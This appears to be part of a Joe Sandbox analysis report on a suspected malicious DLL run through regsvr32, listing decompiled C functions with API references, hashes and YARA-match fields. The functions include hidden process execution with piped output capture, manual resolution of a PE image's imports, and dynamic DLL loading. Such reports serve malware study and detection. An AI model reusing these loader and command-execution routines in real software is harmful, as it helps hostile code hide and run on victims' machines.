                                          • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                                          • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E1000A9B7(signed int __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				struct _SECURITY_ATTRIBUTES _v48;
                                          				intOrPtr _v60;
                                          				char _v64;
                                          				intOrPtr _v76;
                                          				intOrPtr _v80;
                                          				void* _v84;
                                          				short _v92;
                                          				intOrPtr _v96;
                                          				void _v140;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				intOrPtr _t85;
                                          				intOrPtr _t87;
                                          				intOrPtr _t89;
                                          				intOrPtr _t92;
                                          				intOrPtr _t98;
                                          				intOrPtr _t100;
                                          				intOrPtr _t102;
                                          				long _t111;
                                          				intOrPtr _t115;
                                          				intOrPtr _t126;
                                          				void* _t127;
                                          				void* _t128;
                                          				void* _t129;
                                          				void* _t130;
                                          
                                          				_t111 = 0;
                                          				_v24 = __ecx;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_t127 = 0;
                                          				_v8 = 0;
                                          				_v16 = 0;
                                          				_v48.nLength = 0xc;
                                          				_v48.lpSecurityDescriptor = 0;
                                          				_v48.bInheritHandle = 1;
                                          				_v28 = 0;
                                          				memset( &_v140, 0, 0x44);
                                          				asm("stosd");
                                          				_t130 = _t129 + 0xc;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                                          					L18:
                                          					return 0;
                                          				}
                                          				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                                          					L13:
                                          					E1000861A( &_v28, 0);
                                          					if(_v20 != 0) {
                                          						_t77 =  *0x1001e684; // 0x2e5faa0
                                          						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                                          					}
                                          					if(_v8 != 0) {
                                          						_t115 =  *0x1001e684; // 0x2e5faa0
                                          						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                                          					}
                                          					return _t111;
                                          				}
                                          				_t79 = _v16;
                                          				_v76 = _t79;
                                          				_v80 = _t79;
                                          				_v84 = _v12;
                                          				_v140 = 0x44;
                                          				_v96 = 0x101;
                                          				_v92 = 0;
                                          				_t126 = E10008604(0x1001);
                                          				_v28 = _t126;
                                          				if(_t126 == 0) {
                                          					goto L18;
                                          				}
                                          				_push( &_v64);
                                          				_push( &_v140);
                                          				_t85 =  *0x1001e684; // 0x2e5faa0
                                          				_push(0);
                                          				_push(0);
                                          				_push(0x8000000);
                                          				_push(1);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_v24);
                                          				_push(0);
                                          				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
                                          					goto L13;
                                          				}
                                          				_t87 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t87 + 0x30))(_v12);
                                          				_t89 =  *0x1001e684; // 0x2e5faa0
                                          				 *((intOrPtr*)(_t89 + 0x30))(_v16);
                                          				_v24 = _v24 & 0;
                                          				do {
                                          					_t92 =  *0x1001e684; // 0x2e5faa0
                                          					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
                                          					 *((char*)(_v24 + _t126)) = 0;
                                          					if(_t111 == 0) {
                                          						_t127 = E100091A6(_t126, 0);
                                          					} else {
                                          						_push(0);
                                          						_push(_t126);
                                          						_v32 = _t127;
                                          						_t127 = E10009292(_t127);
                                          						E1000861A( &_v32, 0xffffffff);
                                          						_t130 = _t130 + 0x14;
                                          					}
                                          					_t111 = _t127;
                                          					_v32 = _t127;
                                          				} while (_v36 != 0);
                                          				_push( &_v36);
                                          				_push(E1000C379(_t127));
                                          				_t98 =  *0x1001e68c; // 0x2e5fc68
                                          				_push(_t127);
                                          				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
                                          					L12:
                                          					_t100 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t100 + 0x30))(_v64);
                                          					_t102 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t102 + 0x30))(_v60);
                                          					goto L13;
                                          				}
                                          				_t128 = E10009256(_t127);
                                          				if(_t128 == 0) {
                                          					goto L12;
                                          				}
                                          				E1000861A( &_v32, 0);
                                          				return _t128;
                                          			}
                                          0x1000aaf8
                                          0x1000aafd
                                          0x1000aafd
                                          0x1000ab11
                                          0x1000ab13
                                          0x1000ab13
                                          0x1000ab1b
                                          0x1000ab23
                                          0x1000ab24
                                          0x1000ab29
                                          0x1000ab32
                                          0x1000ab52
                                          0x1000ab52
                                          0x1000ab5a
                                          0x1000ab5d
                                          0x1000ab65
                                          0x00000000
                                          0x1000ab65
                                          0x1000ab3b
                                          0x1000ab3f
                                          0x00000000
                                          0x00000000
                                          0x1000ab47
                                          0x00000000

                                          APIs
                                          • memset.MSVCRT ref: 1000A9F4
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
                                          • CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F
                                            • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateHeapPipe$AllocFreememset
                                          • String ID: D
                                          • API String ID: 488076629-2746444292
                                          • Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                          • Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
                                          • Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
                                          • Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E1001249B(signed int __eax, intOrPtr _a4) {
                                          				intOrPtr* _v8;
                                          				signed int* _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				intOrPtr _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				struct HINSTANCE__* _v48;
                                          				intOrPtr _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _t109;
                                          				signed int _t112;
                                          				signed int _t115;
                                          				void* _t163;
                                          
                                          				_v44 = _v44 & 0x00000000;
                                          				if(_a4 != 0) {
                                          					_v48 = GetModuleHandleA("kernel32.dll");
                                          					_v40 = E1000E099(_v48, "GetProcAddress");
                                          					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          					_v32 = _v52;
                                          					_t109 = 8;
                                          					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                          						L24:
                                          						return 0;
                                          					}
                                          					_v56 = 0x80000000;
                                          					_t112 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v8 = _v8 + 0x14;
                                          					}
                                          					_t115 = 8;
                                          					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                          						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
                                          						if(_v36 != 0) {
                                          							if( *_v8 == 0) {
                                          								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                          							} else {
                                          								_v12 =  *_v8 + _a4;
                                          							}
                                          							_v28 = _v28 & 0x00000000;
                                          							while( *_v12 != 0) {
                                          								_v24 = _v24 & 0x00000000;
                                          								_v16 = _v16 & 0x00000000;
                                          								_v64 = _v64 & 0x00000000;
                                          								_v20 = _v20 & 0x00000000;
                                          								if(( *_v12 & _v56) == 0) {
                                          									_v60 =  *_v12 + _a4;
                                          									_v20 = _v60 + 2;
                                          									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                          									_v16 = _v40(_v36, _v20);
                                          								} else {
                                          									_v24 =  *_v12;
                                          									_v20 = _v24 & 0x0000ffff;
                                          									_v16 = _v40(_v36, _v20);
                                          								}
                                          								if(_v24 != _v16) {
                                          									_v44 = _v44 + 1;
                                          									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                          										 *_v12 = _v16;
                                          									} else {
                                          										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                          									}
                                          								}
                                          								_v12 =  &(_v12[1]);
                                          								_v28 = _v28 + 4;
                                          							}
                                          							_v8 = _v8 + 0x14;
                                          							continue;
                                          						}
                                          						_t163 = 0xfffffffd;
                                          						return _t163;
                                          					}
                                          					goto L24;
                                          				}
                                          				return __eax | 0xffffffff;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
                                          • LoadLibraryA.KERNEL32(00000000), ref: 10012551
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID: GetProcAddress$kernel32.dll
                                          • API String ID: 4133054770-1584408056
                                          • Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                          • Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
                                          • Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
                                          • Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 89%
                                          			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                          				char _v8;
                                          				char _v12;
                                          				void _v140;
                                          				signed char _t14;
                                          				char _t15;
                                          				intOrPtr _t20;
                                          				void* _t25;
                                          				intOrPtr _t26;
                                          				intOrPtr _t32;
                                          				WCHAR* _t34;
                                          				intOrPtr _t35;
                                          				struct HINSTANCE__* _t37;
                                          				int _t38;
                                          				intOrPtr _t46;
                                          				void* _t47;
                                          				intOrPtr _t50;
                                          				void* _t60;
                                          				void* _t61;
                                          				char _t62;
                                          				char* _t63;
                                          				void* _t65;
                                          				intOrPtr _t66;
                                          				char _t68;
                                          
                                          				_t65 = __esi;
                                          				_t61 = __edi;
                                          				_t47 = __ebx;
                                          				_t50 =  *0x1001e688; // 0x2de0590
                                          				_t14 =  *(_t50 + 0x1898);
                                          				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                          					_t15 = E100095E1(_t50, 0xb62);
                                          					_t66 =  *0x1001e688; // 0x2de0590
                                          					_t62 = _t15;
                                          					_t67 = _t66 + 0xb0;
                                          					_v8 = _t62;
                                          					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
                                          					_t20 =  *0x1001e688; // 0x2de0590
                                          					asm("sbb eax, eax");
                                          					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
                                          					_t63 = "\\";
                                          					_t26 =  *0x1001e688; // 0x2de0590
                                          					_t68 = E100092E5(_t26 + 0x1020);
                                          					_v12 = _t68;
                                          					E100085D5( &_v8);
                                          					_t32 =  *0x1001e688; // 0x2de0590
                                          					_t34 = E100092E5(_t32 + 0x122a);
                                          					 *0x1001e784 = _t34;
                                          					_t35 =  *0x1001e684; // 0x2e5faa0
                                          					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
                                          					_t37 = LoadLibraryW( *0x1001e784);
                                          					 *0x1001e77c = _t37;
                                          					if(_t37 == 0) {
                                          						_t38 = 0;
                                          					} else {
                                          						_push(_t37);
                                          						_t60 = 0x28;
                                          						_t38 = E1000E171(0x1001bb48, _t60);
                                          					}
                                          					 *0x1001e780 = _t38;
                                          					E1000861A( &_v12, 0xfffffffe);
                                          					memset( &_v140, 0, 0x80);
                                          					if( *0x1001e780 != 0) {
                                          						goto L10;
                                          					} else {
                                          						E1000861A(0x1001e784, 0xfffffffe);
                                          						goto L8;
                                          					}
                                          				} else {
                                          					L8:
                                          					if( *0x1001e780 == 0) {
                                          						_t46 =  *0x1001e6bc; // 0x2e5fbc8
                                          						 *0x1001e780 = _t46;
                                          					}
                                          					L10:
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoadmemset
                                          • String ID: %08x$dll
                                          • API String ID: 3406617148-2963171978
                                          • Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                          • Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
                                          • Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
                                          • Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E10012D70(int _a4, signed int _a8) {
                                          				int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void* __esi;
                                          				void* _t137;
                                          				signed int _t141;
                                          				intOrPtr* _t142;
                                          				signed int _t145;
                                          				signed int _t146;
                                          				intOrPtr _t151;
                                          				intOrPtr _t161;
                                          				intOrPtr _t162;
                                          				intOrPtr _t167;
                                          				intOrPtr _t170;
                                          				signed int _t172;
                                          				intOrPtr _t173;
                                          				int _t184;
                                          				intOrPtr _t185;
                                          				intOrPtr _t188;
                                          				signed int _t189;
                                          				void* _t195;
                                          				int _t202;
                                          				int _t208;
                                          				intOrPtr _t217;
                                          				signed int _t218;
                                          				int _t219;
                                          				intOrPtr _t220;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				int _t224;
                                          				int _t225;
                                          				signed int _t227;
                                          				intOrPtr _t228;
                                          				int _t232;
                                          				int _t234;
                                          				signed int _t235;
                                          				int _t239;
                                          				void* _t240;
                                          				int _t245;
                                          				int _t252;
                                          				signed int _t253;
                                          				int _t254;
                                          				void* _t257;
                                          				void* _t258;
                                          				int _t259;
                                          				intOrPtr _t260;
                                          				int _t261;
                                          				signed int _t269;
                                          				signed int _t271;
                                          				intOrPtr* _t272;
                                          				void* _t273;
                                          
                                          				_t253 = _a8;
                                          				_t272 = _a4;
                                          				_t3 = _t272 + 0xc; // 0x452bf84d
                                          				_t4 = _t272 + 0x2c; // 0x8df075ff
                                          				_t228 =  *_t4;
                                          				_t137 =  *_t3 + 0xfffffffb;
                                          				_t229 =  <=  ? _t137 : _t228;
                                          				_v16 =  <=  ? _t137 : _t228;
                                          				_t269 = 0;
                                          				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                          				asm("o16 nop [eax+eax]");
                                          				while(1) {
                                          					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
                                          					_t141 =  *_t8 + 0x2a >> 3;
                                          					_v12 = 0xffff;
                                          					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                          					if(_t217 < _t141) {
                                          						break;
                                          					}
                                          					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t12 = _t272 + 0x5c; // 0x84e85000
                                          					_t245 =  *_t11 -  *_t12;
                                          					_v8 = _t245;
                                          					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                          					_t247 =  <  ? _t195 : _v12;
                                          					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                          					if(_t227 >= _v16) {
                                          						L7:
                                          						if(_t253 != 4) {
                                          							L10:
                                          							_t269 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t285 = _t227 - _t195;
                                          							if(_t227 != _t195) {
                                          								goto L10;
                                          							} else {
                                          								_t269 = _t253 - 3;
                                          							}
                                          						}
                                          						E10015D90(_t272, _t272, 0, 0, _t269);
                                          						_t18 = _t272 + 0x14; // 0xc703f045
                                          						_t19 = _t272 + 8; // 0x8d000040
                                          						 *( *_t18 +  *_t19 - 4) = _t227;
                                          						_t22 = _t272 + 0x14; // 0xc703f045
                                          						_t23 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                          						_t26 = _t272 + 0x14; // 0xc703f045
                                          						_t27 = _t272 + 8; // 0x8d000040
                                          						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                          						_t30 = _t272 + 0x14; // 0xc703f045
                                          						_t31 = _t272 + 8; // 0x8d000040
                                          						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                          						E10014AF0(_t285,  *_t272);
                                          						_t202 = _v8;
                                          						_t273 = _t273 + 0x14;
                                          						if(_t202 != 0) {
                                          							_t208 =  >  ? _t227 : _t202;
                                          							_v8 = _t208;
                                          							_t36 = _t272 + 0x38; // 0xf47d8bff
                                          							_t37 = _t272 + 0x5c; // 0x84e85000
                                          							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                          							_t273 = _t273 + 0xc;
                                          							_t252 = _v8;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                          							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                          							_t227 = _t227 - _t252;
                                          						}
                                          						if(_t227 != 0) {
                                          							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
                                          							_t273 = _t273 + 0xc;
                                          							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                          							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                          						}
                                          						_t253 = _a8;
                                          						if(_t269 == 0) {
                                          							continue;
                                          						}
                                          					} else {
                                          						if(_t227 != 0 || _t253 == 4) {
                                          							if(_t253 != 0 && _t227 == _t195) {
                                          								goto L7;
                                          							}
                                          						}
                                          					}
                                          					break;
                                          				}
                                          				_t142 =  *_t272;
                                          				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                          				_a4 = _t232;
                                          				if(_t232 == 0) {
                                          					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                          					_t254 =  *_t83;
                                          				} else {
                                          					_t59 = _t272 + 0x2c; // 0x8df075ff
                                          					_t224 =  *_t59;
                                          					if(_t232 < _t224) {
                                          						_t65 = _t272 + 0x3c; // 0x830cc483
                                          						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t260 =  *_t66;
                                          						__eflags =  *_t65 - _t260 - _t232;
                                          						if( *_t65 - _t260 <= _t232) {
                                          							_t67 = _t272 + 0x38; // 0xf47d8bff
                                          							_t261 = _t260 - _t224;
                                          							 *(_t272 + 0x6c) = _t261;
                                          							memcpy( *_t67,  *_t67 + _t224, _t261);
                                          							_t70 = _t272 + 0x16b0; // 0xdf750008
                                          							_t188 =  *_t70;
                                          							_t273 = _t273 + 0xc;
                                          							_t232 = _a4;
                                          							__eflags = _t188 - 2;
                                          							if(_t188 < 2) {
                                          								_t189 = _t188 + 1;
                                          								__eflags = _t189;
                                          								 *(_t272 + 0x16b0) = _t189;
                                          							}
                                          						}
                                          						_t73 = _t272 + 0x38; // 0xf47d8bff
                                          						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                          						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                          						_t225 = _a4;
                                          						_t273 = _t273 + 0xc;
                                          						_t76 = _t272 + 0x6c;
                                          						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                          						__eflags =  *_t76;
                                          						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t184 =  *_t78;
                                          						_t79 = _t272 + 0x2c; // 0x8df075ff
                                          						_t239 =  *_t79;
                                          					} else {
                                          						 *(_t272 + 0x16b0) = 2;
                                          						_t61 = _t272 + 0x38; // 0xf47d8bff
                                          						memcpy( *_t61,  *_t142 - _t224, _t224);
                                          						_t62 = _t272 + 0x2c; // 0x8df075ff
                                          						_t184 =  *_t62;
                                          						_t273 = _t273 + 0xc;
                                          						_t225 = _a4;
                                          						_t239 = _t184;
                                          						 *(_t272 + 0x6c) = _t184;
                                          					}
                                          					_t254 = _t184;
                                          					 *(_t272 + 0x5c) = _t184;
                                          					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                          					_t185 =  *_t81;
                                          					_t240 = _t239 - _t185;
                                          					_t241 =  <=  ? _t225 : _t240;
                                          					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                          					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                          				}
                                          				if( *(_t272 + 0x16c0) < _t254) {
                                          					 *(_t272 + 0x16c0) = _t254;
                                          				}
                                          				if(_t269 == 0) {
                                          					_t218 = _a8;
                                          					__eflags = _t218;
                                          					if(_t218 == 0) {
                                          						L34:
                                          						_t89 = _t272 + 0x3c; // 0x830cc483
                                          						_t219 =  *_t272;
                                          						_t145 =  *_t89 - _t254 - 1;
                                          						_a4 =  *_t272;
                                          						_t234 = _t254;
                                          						_v16 = _t145;
                                          						_v8 = _t254;
                                          						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                          						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                          							_v8 = _t254;
                                          							_t95 = _t272 + 0x5c; // 0x84e85000
                                          							_a4 = _t219;
                                          							_t234 = _t254;
                                          							_t97 = _t272 + 0x2c; // 0x8df075ff
                                          							__eflags =  *_t95 -  *_t97;
                                          							if( *_t95 >=  *_t97) {
                                          								_t98 = _t272 + 0x2c; // 0x8df075ff
                                          								_t167 =  *_t98;
                                          								_t259 = _t254 - _t167;
                                          								_t99 = _t272 + 0x38; // 0xf47d8bff
                                          								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                          								 *(_t272 + 0x6c) = _t259;
                                          								memcpy( *_t99, _t167 +  *_t99, _t259);
                                          								_t103 = _t272 + 0x16b0; // 0xdf750008
                                          								_t170 =  *_t103;
                                          								_t273 = _t273 + 0xc;
                                          								__eflags = _t170 - 2;
                                          								if(_t170 < 2) {
                                          									_t172 = _t170 + 1;
                                          									__eflags = _t172;
                                          									 *(_t272 + 0x16b0) = _t172;
                                          								}
                                          								_t106 = _t272 + 0x2c; // 0x8df075ff
                                          								_t145 = _v16 +  *_t106;
                                          								__eflags = _t145;
                                          								_a4 =  *_t272;
                                          								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                          								_t234 =  *_t108;
                                          								_v8 = _t234;
                                          							}
                                          						}
                                          						_t255 = _a4;
                                          						_t220 =  *((intOrPtr*)(_a4 + 4));
                                          						__eflags = _t145 - _t220;
                                          						_t221 =  <=  ? _t145 : _t220;
                                          						_t146 = _t221;
                                          						_a4 = _t221;
                                          						_t222 = _a8;
                                          						__eflags = _t146;
                                          						if(_t146 != 0) {
                                          							_t114 = _t272 + 0x38; // 0xf47d8bff
                                          							E10014C30(_t255,  *_t114 + _v8, _t146);
                                          							_t273 = _t273 + 0xc;
                                          							_t117 = _t272 + 0x6c;
                                          							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                          							__eflags =  *_t117;
                                          							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                          							_t234 =  *_t119;
                                          						}
                                          						__eflags =  *(_t272 + 0x16c0) - _t234;
                                          						if( *(_t272 + 0x16c0) < _t234) {
                                          							 *(_t272 + 0x16c0) = _t234;
                                          						}
                                          						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                          						_t123 = _t272 + 0xc; // 0x452bf84d
                                          						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                          						__eflags = _t257 - 0xffff;
                                          						_t258 =  >  ? 0xffff : _t257;
                                          						_t124 = _t272 + 0x2c; // 0x8df075ff
                                          						_t151 =  *_t124;
                                          						_t125 = _t272 + 0x5c; // 0x84e85000
                                          						_t235 = _t234 -  *_t125;
                                          						__eflags = _t258 - _t151;
                                          						_t152 =  <=  ? _t258 : _t151;
                                          						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                          						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                          							L49:
                                          							__eflags = _t235 - _t258;
                                          							_t154 =  >  ? _t258 : _t235;
                                          							_a4 =  >  ? _t258 : _t235;
                                          							__eflags = _t222 - 4;
                                          							if(_t222 != 4) {
                                          								L53:
                                          								_t269 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t161 =  *_t272;
                                          								__eflags =  *(_t161 + 4);
                                          								_t154 = _a4;
                                          								if( *(_t161 + 4) != 0) {
                                          									goto L53;
                                          								} else {
                                          									__eflags = _t154 - _t235;
                                          									if(_t154 != _t235) {
                                          										goto L53;
                                          									} else {
                                          										_t269 = _t222 - 3;
                                          									}
                                          								}
                                          							}
                                          							_t131 = _t272 + 0x38; // 0xf47d8bff
                                          							_t132 = _t272 + 0x5c; // 0x84e85000
                                          							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                          							_t134 = _t272 + 0x5c;
                                          							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                          							__eflags =  *_t134;
                                          							E10014AF0( *_t134,  *_t272);
                                          						} else {
                                          							__eflags = _t235;
                                          							if(_t235 != 0) {
                                          								L46:
                                          								__eflags = _t222;
                                          								if(_t222 != 0) {
                                          									_t162 =  *_t272;
                                          									__eflags =  *(_t162 + 4);
                                          									if( *(_t162 + 4) == 0) {
                                          										__eflags = _t235 - _t258;
                                          										if(_t235 <= _t258) {
                                          											goto L49;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								__eflags = _t222 - 4;
                                          								if(_t222 == 4) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						asm("sbb edi, edi");
                                          						_t271 =  ~_t269 & 0x00000002;
                                          						__eflags = _t271;
                                          						return _t271;
                                          					} else {
                                          						__eflags = _t218 - 4;
                                          						if(_t218 == 4) {
                                          							goto L34;
                                          						} else {
                                          							_t173 =  *_t272;
                                          							__eflags =  *(_t173 + 4);
                                          							if( *(_t173 + 4) != 0) {
                                          								goto L34;
                                          							} else {
                                          								_t88 = _t272 + 0x5c; // 0x84e85000
                                          								__eflags = _t254 -  *_t88;
                                          								if(_t254 !=  *_t88) {
                                          									goto L34;
                                          								} else {
                                          									return 1;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					return 3;
                                          				}
                                          			}






















































                                          0x100130ea
                                          0x100130ed
                                          0x10013098
                                          0x10013098
                                          0x1001309a
                                          0x100130a1
                                          0x100130a1
                                          0x100130a3
                                          0x100130a5
                                          0x100130a7
                                          0x100130ab
                                          0x100130ad
                                          0x100130af
                                          0x00000000
                                          0x00000000
                                          0x100130af
                                          0x100130ab
                                          0x1001309c
                                          0x1001309c
                                          0x1001309f
                                          0x00000000
                                          0x00000000
                                          0x1001309f
                                          0x1001309a
                                          0x100130f7
                                          0x100130f9
                                          0x100130f9
                                          0x10013104
                                          0x10012fa7
                                          0x10012fa7
                                          0x10012faa
                                          0x00000000
                                          0x10012fac
                                          0x10012fac
                                          0x10012fae
                                          0x10012fb2
                                          0x00000000
                                          0x10012fb4
                                          0x10012fb4
                                          0x10012fb4
                                          0x10012fb7
                                          0x00000000
                                          0x10012fbb
                                          0x10012fc4
                                          0x10012fc4
                                          0x10012fb7
                                          0x10012fb2
                                          0x10012faa
                                          0x10012f96
                                          0x10012f9f
                                          0x10012f9f

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
